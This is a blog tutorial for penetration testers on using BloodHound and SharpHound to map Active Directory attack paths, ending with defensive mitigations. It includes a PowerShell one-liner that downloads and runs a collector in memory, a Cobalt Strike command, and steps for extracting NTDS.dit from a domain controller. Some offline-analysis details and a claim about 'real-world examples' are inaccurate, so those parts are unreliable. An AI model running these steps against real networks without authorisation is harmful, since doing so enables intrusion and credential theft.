Hello fellow red teamers and pen testers! Today, we’re diving into the world of BloodHound, an incredible tool designed to analyze Active Directory environments for security risks and attack paths. BloodHound is a game-changer when it comes to understanding the inner workings of an organization’s AD environment and identifying potential weak points.

In this article, we will discuss the features of BloodHound, its underlying technology, and how to use it effectively. We will also provide plenty of real-world examples to demonstrate how to leverage this powerful tool for your red team and pen-testing engagements. So, buckle up, and let’s start our journey into the fascinating world of BloodHound.

What is BloodHound?

BloodHound, developed by @_wald0, @CptJesus, and @harmj0y, is an open-source tool that leverages graph theory to reveal hidden relationships within Active Directory environments. It’s designed to help penetration testers and red teamers identify potential attack paths that might be exploited to gain access to sensitive resources or escalate privileges.

BloodHound uses a combination of techniques to collect data from an AD environment, including LDAP queries, SMB sessions, and PowerShell remoting. Once the data is collected, it is ingested into a Neo4j graph database, which is then used by the BloodHound web interface to visualize the relationships between objects such as users, computers, and groups.

Why BloodHound Matters

Active Directory is a complex and powerful technology that has become the de facto standard for managing users, computers, and resources in enterprise environments. With its complexity comes a myriad of potential security risks, many of which can be difficult to identify through manual analysis alone.

BloodHound helps security professionals identify and understand these risks by providing a visual representation of the relationships between objects within an AD environment. This allows red teamers and pen testers to easily spot potential attack paths and identify weak points in an organization’s security posture.

Moreover, BloodHound helps blue teams and security administrators to better understand their environment and implement stronger security controls to prevent attacks.

Installing and Setting up BloodHound

Prerequisites

Before installing BloodHound, ensure that you have the following prerequisites installed on your system:

  • Windows 7/8/10 or Windows Server 2008 R2/2012/2016/2019 (for the BloodHound data collector)
  • .NET Framework 4.5 or higher (Download)
  • A recent version of Neo4j Community Edition (Download)

Installation

To install BloodHound, follow the steps below:

  1. Download the latest release of BloodHound from the GitHub repository (https://github.com/BloodHoundAD/BloodHound/releases).
  2. Extract the archive to a directory of your choice.
  3. Install Neo4j Community Edition from the official website (https://neo4j.com/download/).
  4. After installing Neo4j, configure it to use the BloodHound database by pointing the “dbms.active_database” setting in the “neo4j.conf” file to the “BloodHoundExampleDB.graphdb” directory included in the BloodHound release.
  5. Start the Neo4j service and open the Neo4j browser by navigating to http://localhost:7474.
  6. Set a new password for the “neo4j” user when prompted.
  7. Launch the BloodHound executable (BloodHound.exe) and enter the Neo4j connection details (username: “neo4j”, password: your chosen password, and URL: “bolt://localhost:7687”).

BloodHound Components

BloodHound consists of three main components:

Data Collector (SharpHound)

SharpHound is the data collection component of BloodHound. It’s a C# rewrite of the original PowerShell-based " Invoke-BloodHound" data collector. SharpHound collects data from the target Active Directory environment using a variety of techniques and outputs it in a JSON format, which can then be ingested by the Neo4j database.

BloodHound Web Interface

The BloodHound web interface is an Electron-based application that provides a user-friendly interface for visualizing and querying the data collected by SharpHound. The interface allows you to interact with the Neo4j graph database, displaying the relationships between AD objects, and running built-in queries to identify potential attack paths.

Neo4j Database

Neo4j is a highly scalable, native graph database that stores the data collected by SharpHound. It serves as the backend for the BloodHound web interface, enabling fast and efficient querying of the collected data.

Collecting Data with SharpHound

Invocation Methods

There are several ways to invoke SharpHound, depending on your target environment and operational requirements:

  1. Execute SharpHound directly on the target system (e.g., using a USB drive or remote file share).

    Use a PowerShell one-liner to download and execute SharpHound in-memory:

    IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')

  2. Use a Cobalt Strike beacon to load and execute SharpHound:

    execute-assembly /path/to/SharpHound.exe

Data Collection Techniques

SharpHound collects data using a combination of LDAP queries, SMB session enumeration, and PowerShell remoting. The following collection methods are supported:

  • Default (LDAP queries for user, group, and computer objects)
  • Group (enumerates group membership)
  • LocalGroup (enumerates local group membership on computers)
  • Session (enumerates SMB sessions)
  • ACL (collects access control entries for AD objects)
  • ObjectProps (collects various properties for AD objects)
  • Trusts (enumerates domain trusts)
  • Container (collects information about organizational units and containers)
  • All (performs all collection methods)

To collect data, execute SharpHound with the desired collection method:

SharpHound.exe --CollectionMethod All

This will generate JSON output files in the current working directory, which can then be ingested by the BloodHound web interface.

BloodHound Web Interface

Once you have collected data with SharpHound, open the BloodHound web interface and log in with your Neo4j credentials. The main interface consists of a search bar at the top, a graph canvas in the center, and a sidebar on the left that displays information about the currently selected node.

To import the JSON files generated by SharpHound, click on the “Upload Data” button in the top-right corner of the interface, and select the files from your file system.

Querying the Data

The BloodHound web interface provides several built-in queries that can be used to quickly identify potential attack paths and vulnerabilities. To run a query, click on the “Queries” tab in the left sidebar, and select a query from the list. The graph canvas will update to display the results of the query, with nodes representing AD objects and edges representing relationships between them.

You can also create custom queries using the Cypher query language, which is the native language of Neo4j. To enter a custom query, click on the “Query” tab in the left sidebar, and type your query in the input field.

Common BloodHound Queries

Shortest Path to Domain Admins

This query displays the shortest path from a specified user to a member of the “Domain Admins” group:

MATCH (n:User {name: 'username@domain.com'}), (m:Group {name: 'DOMAIN ADMINS@domain.com'}), p=shortestPath((n)-[*]->(m)) RETURN p

Unconstrained Delegation

This query identifies computers with unconstrained delegation enabled, which can be exploited to impersonate any user on the network:

MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

Kerberoasting

This query identifies users with a Service Principal Name (SPN) set and a weak password that can be cracked using the Kerberoasting attack:

MATCH (u:User) WHERE u.hasspn=true AND u.pwdlastset < (datetime().epochseconds - (90 * 24 * 60 * 60)) RETURN u

Offline Analysis with DSInternals and NTDS.dit

In some cases, you may need to perform offline analysis of an Active Directory environment, such as when you have a copy of the NTDS.dit file but no direct access to the live AD environment. In this section, we’ll discuss how to use the DSInternals PowerShell module and its accompanying dsamain.exe tool to mount an NTDS.dit file and perform offline analysis using BloodHound.

The DSInternals PowerShell module, developed by Michael Grafnetter, provides a set of cmdlets for working with Active Directory databases and objects, including the ability to mount and query NTDS.dit files.

To perform offline analysis with DSInternals and BloodHound, follow the steps below:

  1. Install the DSInternals PowerShell module from the PowerShell Gallery:

    Install-Module -Name DSInternals

  2. Extract the NTDS.dit file and the associated SYSTEM registry hive from the target domain controller. You can do this using tools like ntdsutil.exe or other forensic tools.

  3. Mount the NTDS.dit file using dsamain.exe:

    dsamain -dbpath "C:\path\to\NTDS.dit" -ldapport 10389 -allowUpgrade -systemKey "C:\path\to\SYSTEM.hive"

    This command mounts the NTDS.dit file on the local LDAP port 10389 and uses the SYSTEM registry hive to decrypt the database.

  4. Modify the SharpHound data collector to point to the local LDAP server (localhost:10389):

    SharpHound.exe --CollectionMethod All --DomainController "localhost:10389" --LdapUsername "DOMAIN\username" --LdapPassword "password"

  5. Execute SharpHound to collect data from the mounted NTDS.dit file.

  6. Import the collected data into the BloodHound web interface, as described in the “BloodHound Web Interface” section above.

  7. Perform analysis and run queries in BloodHound as you would with an online Active Directory environment.

By mounting the NTDS.dit file with dsamain.exe and using the DSInternals PowerShell module, you can perform offline analysis with BloodHound, providing a powerful and flexible way to assess the security posture of an Active Directory environment even when direct access is not available.

Mitigation Strategies

To defend against the types of attacks that BloodHound helps identify, organizations should consider implementing the following mitigation strategies:

  • Regularly review group memberships and access control lists to ensure that only necessary permissions are granted.
  • Disable or restrict high-risk features such as unconstrained delegation and delegation of credentials.
  • Implement strong password policies and regularly review password age for service accounts.
  • Limit the use of high-privilege accounts and restrict their access to sensitive systems.
  • Monitor and audit Active Directory for signs of malicious activity, such as unexpected group membership changes or privilege escalations.

Conclusion

BloodHound is an invaluable tool for red teamers, pen testers, and blue teams alike. It provides a powerful and efficient way to analyze Active Directory environments for security risks and attack paths. By using BloodHound to visualize the complex relationships within an AD environment, security professionals can quickly identify potential weak points and develop effective mitigation strategies.

In this article, we’ve covered the installation, setup, and usage of BloodHound, including its components, data collection techniques, and querying capabilities. We’ve also provided real-world examples of how BloodHound has been used to identify security vulnerabilities and discussed mitigation strategies to protect against these threats.

By incorporating BloodHound into your security toolkit, you’ll be well-equipped to identify and understand the risks and attack paths within your target Active Directory environments. Remember that no tool is a silver bullet, and BloodHound should be used in conjunction with other security tools and methodologies for a comprehensive security assessment. Stay curious, keep learning, and happy hacking!